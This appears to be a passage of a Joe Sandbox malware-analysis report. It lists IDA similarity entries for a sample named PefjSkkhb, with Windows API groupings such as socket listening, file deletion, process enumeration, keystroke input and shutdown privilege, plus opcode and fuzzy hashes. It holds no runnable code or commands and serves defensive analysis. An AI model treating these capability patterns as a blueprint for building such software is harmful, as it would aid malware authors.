                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$closesocket$bindlistensocket
                                                                      • String ID:
                                                                      • API String ID: 540024437-0
                                                                      • Opcode ID: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                      • Instruction ID: 8e3fdf581117b70edd47e6d6a6b58e7b1de5cfbfcd0b780de82f7ff31c1a5b0d
                                                                      • Opcode Fuzzy Hash: f24216cf85a9cfc84ec9f45b81836fed2d974ebfd3edccbe64e1b0b478a4ea6b
                                                                      • Instruction Fuzzy Hash: 8F419262A4CA4285EB10FF26944427DA760FB85FB4F844630DAAE87792DF3CF1418790
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                                      • API String ID: 0-572801152
                                                                      • Opcode ID: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                      • Instruction ID: 71a13d62303229e0dddcae8eb078674ca7b3eeba0e323233a36a1b68d6450bf0
                                                                      • Opcode Fuzzy Hash: 3b41e49848b2a854f69dbea14d55eff9d78a714003a2fd806a44bf0603c53a60
                                                                      • Instruction Fuzzy Hash: 59E10732A08B8686EB10FF65D5402ADB7A0FB847A8F904236DE5D87B94DF3CE545C790
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                      • String ID: \*.*
                                                                      • API String ID: 2649000838-1173974218
                                                                      • Opcode ID: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                      • Instruction ID: ff6d0c1d7acbe0ef8c56aa684d261cb2fe790e9b87121310cb56d72af10abe11
                                                                      • Opcode Fuzzy Hash: 33faa39baa03be8120850797a18634ea376334063adf963c1f4e83021c640b6d
                                                                      • Instruction Fuzzy Hash: 9D417222A68A4292EA50FF10E4401EDE360FB94BA4FD41131EA5E87795DF7CE549CBA0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 1239891234-0
                                                                      • Opcode ID: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                      • Instruction ID: 1a21e8a63ea69c222aecbd840d8f581e33ca1670810cee408dad5401e61b1abc
                                                                      • Opcode Fuzzy Hash: a012b73838b214995184a74d390d22d5d4f2798e6d2ee27280782cebe5dad480
                                                                      • Instruction Fuzzy Hash: A131A632608B81C5D760EF25E8443AEB3A4FB84768F900136EA9D83B55DF3CD545CB50
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState
                                                                      • String ID: *.*
                                                                      • API String ID: 1927845040-438819550
                                                                      • Opcode ID: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                      • Instruction ID: ae71e301ff00ebb524f00510f65d6e956d789c117f0611f541e6169fba2b92d3
                                                                      • Opcode Fuzzy Hash: 6a88b2503df8e5f85dd4c462440c0fc5a039f53792e222b5ac7c7da246e49fe0
                                                                      • Instruction Fuzzy Hash: 2F519122648B9285EB10FF25E4541ADA360FB85BA8F980132DE4D83795DF38E645C7A0
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLastinet_addrsocket
                                                                      • String ID:
                                                                      • API String ID: 4170576061-0
                                                                      • Opcode ID: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                      • Instruction ID: 8fcb20947775f482500273b7ac6690a953effd836551045079b33e7a77789a4c
                                                                      • Opcode Fuzzy Hash: ea9322bb4ddc6559c8a09ac09f5cb3baf94142c17e0f244aa1b03abeb354fc5a
                                                                      • Instruction Fuzzy Hash: 5F51C166B98A5281EB14FF16A404669AB90BB89FF4F848531DE5E87796CF3CF100C7D0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: _handle_error
                                                                      • String ID: !$VUUU$fmod
                                                                      • API String ID: 1757819995-2579133210
                                                                      • Opcode ID: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                      • Instruction ID: 7f45ce20f98e7b7819a0f6d909798568821e479282d3ae33dff828493771edea
                                                                      • Opcode Fuzzy Hash: 891804033c6d9bcc01b81d75b861d81fbb0e9180f173dbd42278a229c0b4683c
                                                                      • Instruction Fuzzy Hash: 0CB11A21A1CFC445D6B79E3550113BAF259AFAA3A0F50C332D99E76BA0DF2CE5C28740
                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7C0E92D60
                                                                        • Part of subcall function 00007FF7C0E8B184: GetCurrentProcess.KERNEL32(00007FF7C0E8B21D), ref: 00007FF7C0E8B1B1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                      • String ID: *$.$.
                                                                      • API String ID: 2518042432-2112782162
                                                                      • Opcode ID: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                      • Instruction ID: 262715f442721d3a33634baef3f2f38cdf1aea8c8424c5b68a08be207437d820
                                                                      • Opcode Fuzzy Hash: 10686662bc6c287608bb1927b489f0d8a7225314f89d29ff6f04aab4d96db585
                                                                      • Instruction Fuzzy Hash: 7751C062B54A5585FF11FFA698501FDA3A4BB44BE8F944139CF0DA7B85DF38E04283A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: System$AdjustErrorExitInitiateLastLookupPowerPrivilegePrivilegesShutdownStateTokenValueWindows
                                                                      • String ID: SeShutdownPrivilege
                                                                      • API String ID: 2163645468-3733053543
                                                                      • Opcode ID: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                      • Instruction ID: c102b67c5dedc8e54680f21602e1deb443d3e5cac297ac8799759b368bcfbae3
                                                                      • Opcode Fuzzy Hash: d91431930fad3db0e3d1089491ea6c9a4476952d79cc7edd8ba2b1494bd95168
                                                                      • Instruction Fuzzy Hash: 7A119432B1C61282EB24FF25A44116EE251BF84760F894136E55DC3B99EF3DF845C790
                                                                      APIs
                                                                      Strings
                                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00007FF7C0E75C43
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: DebugDebuggerErrorLastOutputPresentString
                                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                      • API String ID: 389471666-631824599
                                                                      • Opcode ID: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                      • Instruction ID: 909eab922ae5fb43d7ff79ba5ef46924ea51332fe1106e22a14be2ce15c7737d
                                                                      • Opcode Fuzzy Hash: a6f712f19902253ba7949c04243615cc0ab49cc8bc5c14b6f720c4296af9f677
                                                                      • Instruction Fuzzy Hash: 7B116D32618B4296E705BF26D6553B9B3A4FB44765F804135C64D82B50EF7CF1A4C7A0
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AddressLibraryLoadProc
                                                                      • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                                                      • API String ID: 2574300362-3689287502
                                                                      • Opcode ID: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                      • Instruction ID: 921b22b5fec56c3f86e490f0515c90a3f45b2751d4662d14c11a85a02e45b01f
                                                                      • Opcode Fuzzy Hash: 0d692eaeaee984e821757872aa743bf672a5f4ffbc2c7638c6bb6d49df66a179
                                                                      • Instruction Fuzzy Hash: 11E0C925A09F0681EB15AF21E41437863A5BB08B68FC40835C91D86350EFBCB594C390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Variant$ClearInit$CopyCreateInitializeInstanceUninitialize
                                                                      • String ID:
                                                                      • API String ID: 2733932498-0
                                                                      • Opcode ID: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                      • Instruction ID: b1feadbbc00cd78f00a48e344c65402671e34c20b6671cd451d39109fcda4dc8
                                                                      • Opcode Fuzzy Hash: a09277b6a6935f26de9d5b61002aef5de2559b3d5eb22cd3cc7460a06f749bcb
                                                                      • Instruction Fuzzy Hash: 49B18126B48B5681EB10FF26D4906ADA764FB48FE4F855432DE5E87796CF38E440C390
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Process32$CloseCompareCreateFirstHandleNextSnapshotStringToolhelp32
                                                                      • String ID:
                                                                      • API String ID: 2000298826-0
                                                                      • Opcode ID: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                      • Instruction ID: cc1449c6eb6cb67dfdccb3553317e88b0e8c9b41cd16cc631b1d40fca54052ff
                                                                      • Opcode Fuzzy Hash: 5b1cc7803f552fdfb6a5c1b64286c224a353268d24a72ba4bd1cd77bb81f450c
                                                                      • Instruction Fuzzy Hash: 5C716036A18B4586E700FF25E4443AEB3A1FB88B98F804132EA4D47769DF7CE545C790
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: KeyboardState$InputMessagePostSend
                                                                      • String ID:
                                                                      • API String ID: 432972143-0
                                                                      • Opcode ID: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                      • Instruction ID: e25ca4bbc9e2a099d306a1bb30e901b8a0ce5003a5b6631cb01e295a785eaf02
                                                                      • Opcode Fuzzy Hash: 56c9a0b6ee225f986b8f36bfa830b7f851ce703ec5b55e2ab927aaea8bed82d2
                                                                      • Instruction Fuzzy Hash: FE412B61A4D68241F730BF219610A7AE6A0FB44BB4F941131EA9A537D4CF3EF981C7B1
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: Find$File$CloseFirstNext
                                                                      • String ID:
                                                                      • API String ID: 3541575487-0
                                                                      • Opcode ID: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                      • Instruction ID: c40960733d27e08e5827c89f295afc26a4e1c8c422959b332027e480aa7aa1b0
                                                                      • Opcode Fuzzy Hash: 8095db4ae0d7967ea6bb3d0986d3fec5b3e30099e78eeea076049f78ea6c2b13
                                                                      • Instruction Fuzzy Hash: 80518A32648B4685EB14FF25E0842ACB764FB84BA4F844632CA5E837A5CF7CE591C760
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: e4554bc00dae79acf66b4cb450403028b462a58aae1405cf9917eeaf9ae9a37c
                                                                      • Instruction ID: fb7d449bc57ebd6c2ab469efd2c41d8f5d127d7d7fa6f735ca44be9c4090752b
                                                                      • Opcode Fuzzy Hash: e4554bc00dae79acf66b4cb450403028b462a58aae1405cf9917eeaf9ae9a37c
                                                                      • Instruction Fuzzy Hash: 9E319336608F8582EB11AF25E48026EB770FB84B98F544531EB8E83765DF7CE446CB50
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustConcurrency::cancel_current_taskErrorLastLookupPrivilegePrivilegesTokenValue
                                                                      • String ID:
                                                                      • API String ID: 2278415577-0
                                                                      • Opcode ID: 8475faea5d733a641d8ed04cc9d05f049bff3c861d0b4ae6caf63cee6e71bede
                                                                      • Instruction ID: 75ed3ecd09083aeac9ae746ad0bd8c99e1ab7c3c1f8877535fc06c41899dd1af
                                                                      • Opcode Fuzzy Hash: 8475faea5d733a641d8ed04cc9d05f049bff3c861d0b4ae6caf63cee6e71bede
                                                                      • Instruction Fuzzy Hash: 0821D072A08A8185EB00EF26E04426AB7A0FB88BE4F848134CF4C87718DF78E595C794
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_7ff7c0e50000_PefjSkkhb.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                      • Instruction ID: 3eb7512ff40f3ddb2e94420f6b1f0f241cdbeff402f8d9f9b19fdbfc120ebbd3
                                                                      • Opcode Fuzzy Hash: 3eb730c412da6b237fdafb429a025579d281427b312740e7d186e067821098ed
                                                                      • Instruction Fuzzy Hash: 23014073628781CFE7209F20D4553AE73A0F75476EF400929E64D86A98CB7DD158CB80
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.2238883218.00007FF7C0E51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF7C0E50000, based on PE: true
                                                                      • Associated: 0000000B.00000002.2238864380.00007FF7C0E50000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F05000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238949175.00007FF7C0F28000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2238999063.00007FF7C0F3A000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                      • Associated: 0000000B.00000002.2239025602.00007FF7C0F44000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
